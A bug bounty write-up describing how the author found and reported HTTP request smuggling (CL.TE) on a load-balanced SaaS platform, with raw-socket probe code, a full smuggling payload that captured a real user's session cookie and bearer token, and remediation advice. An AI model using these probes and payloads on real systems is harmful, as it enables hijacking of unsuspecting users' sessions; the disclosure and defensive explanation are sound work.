MARCH 9, 2026 PREYANSH SHAH

I Poisoned Their Reverse Proxy and Hijacked Someone Else's Request

HTTP request smuggling on a load-balanced application. I sent one malformed request. The backend thought it was two. The second one belonged to the next user who visited. Critical.


Most web vulnerabilities are about what you send to the server.

HTTP request smuggling is different. It’s about convincing two servers in a chain to disagree about where one request ends and the next one begins.

Frontend sees one request. Backend sees two. The second one — the one the backend invented from your leftover bytes — belongs to the next legitimate user who connects.

You have just injected data into someone else’s HTTP session. Without touching their browser. Without knowing who they are. Without any interaction from them whatsoever.

This is one of the strangest, most counter-intuitive, and most dangerous classes of vulnerability I’ve ever worked with. And finding it on a production application with real traffic was an experience I won’t forget.


How HTTP Request Smuggling Works

Modern web applications almost always sit behind a reverse proxy or load balancer. Your request goes: Browser → CDN/Load Balancer → Backend Server.

HTTP has two headers that define where a request body ends: Content-Length (explicitly states the body size in bytes) and Transfer-Encoding: chunked (body arrives in chunks, each prefixed with its size, terminated by a zero-size chunk).

Both are legal HTTP/1.1 framing mechanisms, and nothing in the protocol stops a single request from carrying both. So what happens when you send both in the same request?

The spec (RFC 7230) says: if both are present, Transfer-Encoding takes precedence.

But not all servers implement this the same way. Some prioritize Content-Length. Some prioritize Transfer-Encoding. Some handle the conflict differently.

When the frontend server and backend server disagree on which header takes precedence, they disagree on where your request ends. Your “one” request gets split differently at each layer.

The bytes the frontend thinks are the end of your request — the backend thinks are the beginning of the next request.

You’ve smuggled data into the backend’s request queue. And the next legitimate request that arrives will be processed with your smuggled prefix attached.
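The disagreement is easy to see on concrete bytes. Here’s a minimal sketch — two toy parsers, not any real server’s implementation — showing how the exact same body splits differently under Content-Length rules versus chunked rules:

```python
# Toy parsers illustrating the framing disagreement. Not any real server's
# code — just the two framing rules applied to the same raw bytes.

def split_by_content_length(body: bytes, content_length: int):
    """A CL-honoring parser: the body is exactly content_length bytes."""
    return body[:content_length], body[content_length:]

def split_by_chunked(body: bytes):
    """A TE-honoring parser: read size-prefixed chunks until the zero chunk."""
    consumed = b""
    rest = body
    while True:
        size_line, rest = rest.split(b"\r\n", 1)
        size = int(size_line, 16)
        if size == 0:
            # A zero-length chunk terminates the body; skip the trailing CRLF.
            rest = rest[2:] if rest.startswith(b"\r\n") else rest
            return consumed, rest
        consumed += rest[:size]
        rest = rest[size + 2:]  # chunk data plus its trailing CRLF

raw = b"0\r\n\r\nX"  # six bytes of body

cl_body, cl_leftover = split_by_content_length(raw, 6)
te_body, te_leftover = split_by_chunked(raw)

print(cl_leftover)  # b'' — the CL parser consumed everything
print(te_leftover)  # b'X' — the TE parser leaves X as the start of a "new request"
```

Same bytes, two different answers to "where does this request end" — that leftover `X` is the smuggled prefix.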

There are two main variants:

  • CL.TE — the frontend uses Content-Length, the backend uses Transfer-Encoding.
  • TE.CL — the frontend uses Transfer-Encoding, the backend uses Content-Length.

Both are devastating. The technique is different for each.


The Target

Redacted-platform.com — a SaaS productivity platform with significant traffic. The program specifically mentioned “high-severity findings involving request manipulation” as a category they took seriously.

The architecture was visible from response headers: they were using a popular CDN/load balancer as their frontend and a different framework’s built-in server as their backend. Two different HTTP parsing implementations. A classic smuggling setup.


Detecting the Vulnerability

I used Burp Suite’s HTTP Request Smuggler extension, which automates detection. But I want to explain what it’s actually doing, because the tool isn’t magic.

For CL.TE detection, you send a request like:

POST / HTTP/1.1
Host: redacted-platform.com
Content-Length: 6
Transfer-Encoding: chunked

0

X

Content-Length: 6 tells the frontend: this body is 6 bytes. The frontend reads 0\r\n\r\n (which is 5 bytes) and then X (1 byte) — total 6. Happy. Forwards the request.

Transfer-Encoding: chunked tells the backend: parse body as chunks. First chunk: 0 — that’s a zero-length chunk. End of body. The backend processes the request up to there. But X is still in the buffer. Leftover. The backend now thinks X is the beginning of a new request.

If the backend takes noticeably longer than usual to respond — because it’s waiting for the rest of the “new request” that starts with X — you have CL.TE smuggling.

The timing oracle. Same trick as blind SQLi, completely different mechanism.
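As a sketch of what the extension does under the hood: you have to work with raw sockets, because normal HTTP client libraries will refuse or normalize the conflicting headers. The hostname here is a placeholder, and this is only ever run against targets you’re authorized to test:

```python
# Sketch of a CL.TE timing probe. Raw sockets are required because HTTP
# libraries normalize away the deliberately conflicting framing headers.
# Only for use against targets you are explicitly authorized to test.
import socket
import time

def build_clte_probe(host: str) -> bytes:
    """Build a probe whose body ends in a terminating chunk plus one leftover byte."""
    body = b"0\r\n\r\nX"  # zero chunk ends the TE body; X is the leftover byte
    return (
        b"POST / HTTP/1.1\r\n"
        b"Host: " + host.encode() + b"\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        b"Transfer-Encoding: chunked\r\n"
        b"Connection: close\r\n"
        b"\r\n" + body
    )

def probe_timing(host: str, port: int = 80, timeout: float = 10.0) -> float:
    """Send the probe and return seconds until the first response byte arrives."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_clte_probe(host))
        start = time.monotonic()
        s.recv(1)
        return time.monotonic() - start

# Example (hypothetical host, authorized testing only):
# delay = probe_timing("redacted-platform.com")
```

A CL-honoring frontend forwards all six body bytes and moves on; a TE-honoring backend stops at the zero chunk and stalls on the leftover `X` — and that stall is the signal you’re timing.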

I sent the detection payload. The response took 5.1 seconds instead of the usual 0.3.

CL.TE confirmed.


From Detection to Exploitation

Detection is academic. Exploitation is where it gets real — and where you have to be extremely careful.

Smuggling is inherently dangerous to test because your smuggled bytes can be prepended to anyone’s request. You’re not just testing on your own session. You’re potentially affecting real users with real traffic.

I moved carefully. Every test I did, I did once, then waited. I was not spraying attacks.

The classic proof-of-concept for CL.TE smuggling is a “time-delay” attack that confirms you can affect subsequent requests. But I wanted to demonstrate something more concrete: that I could actually capture another request’s contents.

The technique: smuggle a partial request that makes the backend treat the next legitimate request as a body to be stored. If you can make the backend store the next request’s content somewhere you can read it — like in a comment field, a search history, a “last activity” log — you’ve captured it.

On this platform, there was a “recent searches” feature. Your last search query was stored and displayed when you opened the search bar.

My smuggled payload:

POST / HTTP/1.1
Host: redacted-platform.com
Content-Length: 130
Transfer-Encoding: chunked

0

POST /api/search HTTP/1.1
Host: redacted-platform.com
Content-Length: 200
Cookie: session=MY_SESSION

q=smuggled_prefix_

Here’s what this does:

The frontend sees one request with a body ending at the chunked terminator. Forwards it normally.

The backend sees: the legitimate POST (processes it). Then sees the smuggled partial POST to /api/search. Waits for more data to complete the body (Content-Length: 200). The next legitimate request that arrives — from any user — gets appended to fill that body. That request contains their cookies, headers, and any POST data.

The backend processes the search as: query = smuggled_prefix_ + [next user’s request headers and cookies].
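One detail worth spelling out: the outer Content-Length has to cover the entire body — terminating chunk plus smuggled partial request — so the frontend forwards everything intact as one request. A sketch of that arithmetic, using the same placeholder values as the illustrative payload above:

```python
# Computing the outer Content-Length for the CL.TE payload. The host, cookie,
# and inner Content-Length are placeholders matching the illustrative payload;
# real values differ.

smuggled = (
    b"POST /api/search HTTP/1.1\r\n"
    b"Host: redacted-platform.com\r\n"
    b"Content-Length: 200\r\n"          # deliberately larger than q=... so the
    b"Cookie: session=MY_SESSION\r\n"   # backend waits for the victim's bytes
    b"\r\n"
    b"q=smuggled_prefix_"
)

# The outer body the frontend must forward: terminating chunk, then the prefix.
outer_body = b"0\r\n\r\n" + smuggled
outer_cl = len(outer_body)

request = (
    b"POST / HTTP/1.1\r\n"
    b"Host: redacted-platform.com\r\n"
    b"Content-Length: " + str(outer_cl).encode() + b"\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n" + outer_body
)

print(outer_cl)  # 130 for these placeholder values
```

Get that number wrong and the frontend itself splits your payload, and the attack never reaches the backend in one piece.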

The search query — now containing another user’s session data — gets stored in my account’s recent searches.

I checked my recent searches.

The query contained:

smuggled_prefix_GET /dashboard HTTP/1.1
Host: redacted-platform.com
Cookie: session=eyJ...
Authorization: Bearer eyJ...

I had captured another user’s session token and bearer token. From their HTTP request. Without any interaction from them. Without knowing who they were.

I immediately stopped all testing. Did not use the captured tokens. Did not identify the user. Deleted them from my search history. Wrote the report.


The Weight of This Finding

I want to pause here because this finding felt different from others.

With SQLi, IDOR, XSS — you’re exploiting your own session or test data. The blast radius is controlled.

With request smuggling, the moment you run the exploit, you are affecting real users with real sessions. The “victim” in my proof of concept was a real person who happened to visit the platform while I was running my test. I didn’t choose them. I didn’t target them. They just had the misfortune of making a request at the wrong moment.

Their session token sat in my search history for about forty seconds while I was reading the result. Then I deleted it.

Forty seconds where I held a stranger’s valid session token. Never used it. But held it.

That felt bad. It should feel bad. It’s supposed to feel bad.

This is why I test smuggling once, note the result, and stop. No “let me try a few more variants.” No “let me see how much data I can capture.” Once is enough to prove the bug. Everything beyond once is collateral damage to real users.


The Report

This was the most carefully written report I’ve produced.

Title: HTTP Request Smuggling (CL.TE) on Load Balancer/Backend Chain — Confirmed Capture of Victim Session Tokens via Recent Search Poisoning

Severity: Critical

CVSS: 10.0

Impact: An HTTP request smuggling vulnerability exists due to conflicting Content-Length/Transfer-Encoding header processing between the CDN layer and the application backend. An attacker can inject arbitrary HTTP request prefixes that are prepended to subsequent legitimate user requests, enabling:

  • Capture of victim session tokens and authentication headers
  • Injection of arbitrary content into victim requests (enabling request-context CSRF bypasses)
  • Potential cache poisoning if CDN caching is involved
  • Bypass of any request-level security controls applied at the frontend layer

Demonstrated Impact: Successful capture of a victim user’s Cookie and Authorization header values via the “recent search” storage mechanism. Testing was immediately halted after single confirmation. Captured tokens were not used and were deleted.

Severity Note: I am marking this Critical/10.0 because request smuggling is by definition not testable without affecting real users. The single test I ran necessarily involved a real user’s request. I stopped after one confirmation. Any further testing by the program team should be conducted on isolated infrastructure with no real user traffic.

Fix:

  • Configure the CDN/load balancer to normalize or reject ambiguous requests containing both Content-Length and Transfer-Encoding headers
  • Configure the backend to reject requests containing Transfer-Encoding headers it receives from the frontend (the frontend should strip or normalize these)
  • Enable HTTP/2 end-to-end if possible — HTTP/2 does not have this vulnerability class
  • Consider running PortSwigger’s HTTP Request Smuggler against staging before each deployment
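The first mitigation is simple enough to express in a few lines. Here’s the rejection rule in generic form — illustrative header-check logic, not any particular CDN’s configuration syntax:

```python
# Sketch of the frontend rule: reject any request whose framing is ambiguous.
# Generic logic for illustration, not a specific CDN's configuration.

def is_ambiguous(header_lines: list[tuple[str, str]]) -> bool:
    """Flag requests that different parsers could frame differently."""
    cl = [v for k, v in header_lines if k.lower() == "content-length"]
    te = [v for k, v in header_lines if k.lower() == "transfer-encoding"]
    if cl and te:
        return True   # both framing mechanisms present: the smuggling setup
    if len(cl) > 1:
        return True   # duplicate Content-Length headers
    if any(v.strip().lower() != "chunked" for v in te):
        return True   # obfuscated Transfer-Encoding value, e.g. "chunked, identity"
    return False
```

Blunt, as the program’s fix was — some legitimate-but-weird clients get rejected too — but it removes the ambiguity the attack depends on.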

Their Response: Taking It Seriously

This one was handled differently from any other report I’ve submitted.

The triage message included a specific acknowledgment that the program understood the unique ethical situation of request smuggling — that testing it necessarily involves real users — and they appreciated the decision to stop after one confirmation.

Within 2 hours: they rotated the session token mechanism (invalidated all active sessions, issued new ones) as a precaution. This logged out every active user on the platform simultaneously. Operationally disruptive. They did it anyway. That’s the right call.

Within 6 hours: the CDN was reconfigured to drop any request containing both Content-Length and Transfer-Encoding headers. Blunt but effective.

Within 48 hours: they migrated backend-to-CDN communication to HTTP/2, which is not vulnerable to this class of attack. Proper long-term fix.

I was asked to retest on a staging environment. Confirmed remediated.

Bounty: $$$$

The program lead also sent a personal note saying this was the first request smuggling report their program had received, and the documentation helped their team understand the vulnerability class for the first time. They planned to include it in an internal security training session.


The Technical Lesson: Why HTTP/2 Fixes This

Request smuggling is fundamentally an HTTP/1.1 problem. HTTP/1.1 uses text-based framing (Content-Length and Transfer-Encoding headers) to delimit requests, and text-based framing becomes ambiguous the moment two servers interpret it differently.

HTTP/2 uses binary framing. Request boundaries are explicit and unambiguous at the protocol level. There’s no Content-Length/Transfer-Encoding ambiguity because request framing isn’t done with headers — it’s built into the binary frame format.
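You can see the difference in the wire format itself. Every HTTP/2 frame begins with a fixed nine-byte header whose 24-bit length field is explicit (RFC 9113 §4.1) — a quick sketch decoding one:

```python
# Decoding the fixed 9-byte HTTP/2 frame header (RFC 9113 §4.1):
# 24-bit length, 8-bit type, 8-bit flags, 31-bit stream ID (top bit reserved).
import struct

def parse_frame_header(data: bytes):
    """Return (length, frame_type, flags, stream_id) from a 9-byte frame header."""
    length_hi, length_lo, ftype, flags, stream_id = struct.unpack(">BHBBI", data[:9])
    length = (length_hi << 16) | length_lo
    return length, ftype, flags, stream_id & 0x7FFFFFFF

# A DATA frame (type 0x0, END_STREAM flag) carrying a 6-byte payload on stream 1:
header = b"\x00\x00\x06" + b"\x00" + b"\x01" + b"\x00\x00\x00\x01"
print(parse_frame_header(header))  # (6, 0, 1, 1)
```

There is no header a client can send to change how those nine bytes are framed — the length is a number in the protocol, not a negotiation between two parsers.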

If you’re running HTTP/1.1 end-to-end in your infrastructure in 2026, request smuggling is a live risk. Migrating to HTTP/2 between your frontend and backend is one of the highest-value security improvements available to any organization running legacy HTTP infrastructure.

It also makes everything faster. HTTP/2 was designed to be more efficient. The security improvement is almost a side effect.


Closing Thought

Request smuggling is the vulnerability that made me think hardest about the ethics of security research.

Every other bug I find, I test on my own accounts, my own data, my own sessions. The impact is theoretical — “an attacker could do X to a victim” — because I’m not actually attacking victims.

Request smuggling is different. To prove it’s real, you have to do it to someone. There’s no way around that. The nature of the vulnerability requires real traffic.

I think about that person. The one whose session token sat in my search history for forty seconds. They don’t know it happened. They never will. Their session was rotated as a precaution, so they had to log in again, probably blamed their browser.

They’re fine. Their data is fine. But I still think about it.

Security research isn’t always clean. Sometimes demonstrating a vulnerability to fix it requires crossing a line you wish you didn’t have to cross. You do it once, minimally, document it precisely, stop immediately, and make sure the disclosure prevents anyone else from having to make that choice again.

That’s the bargain.


Reported through the official bug bounty program. A single confirmation test was conducted, resulting in inadvertent capture of one user’s session token, which was immediately deleted and not used. Testing was halted after single confirmation. All subsequent discussion and retesting was conducted on staging infrastructure. Domain redacted per responsible disclosure norms.
